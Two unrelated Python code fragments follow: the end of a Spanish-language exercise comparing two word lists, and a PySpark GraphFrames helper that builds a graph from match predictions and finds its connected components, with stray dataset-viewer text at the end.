            if segunda[i] in segunda[:i]:
                del(segunda[i])
        # Words present in both lists (order of `primera` preserved).
        comunes = []
        for i in primera:
            if i in segunda:
                comunes += [i]
        print("Palabras que aparecen en las dos listas:", comunes)
        # Words only in the first list.
        soloPrimera = []
        for i in primera:
            if i not in segunda:
                soloPrimera += [i]
        print("Palabras que sólo aparecen en la primera lista:", soloPrimera)
        # Words only in the second list.
        soloSegunda = []
        for i in segunda:
            if i not in primera:
                soloSegunda += [i]
        print("Palabras que sólo aparecen en la segunda lista:", soloSegunda)
        todas = comunes + soloPrimera + soloSegunda
        print("Todas las palabras:", todas)
from graphframes import GraphFrame
# Need a dataset of edges and nodes
def get_graph(orig_df, predictions, orig_df_id_col="row_id", predictions_id_col="id"):
    """Build a GraphFrame: nodes from orig_df, edges from positive predictions.

    Edges keep only rows with prediction == 1.0, and the paired id columns
    (<id>_l / <id>_r) are renamed to the src/dst names GraphFrame expects.
    """
    predictions_nodes = orig_df.withColumnRenamed(orig_df_id_col, "id")
    predictions_edges = predictions.withColumnRenamed(f"{predictions_id_col}_l", "src").withColumnRenamed(
        f"{predictions_id_col}_r", "dst").filter(predictions.prediction == 1.0)
    return GraphFrame(predictions_nodes, predictions_edges)
def get_connected_components(*arg, **kwarg):
    """Construct the graph from the inputs and return its connected components."""
    graph = get_graph(*arg, **kwarg)
    return graph.connectedComponents()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.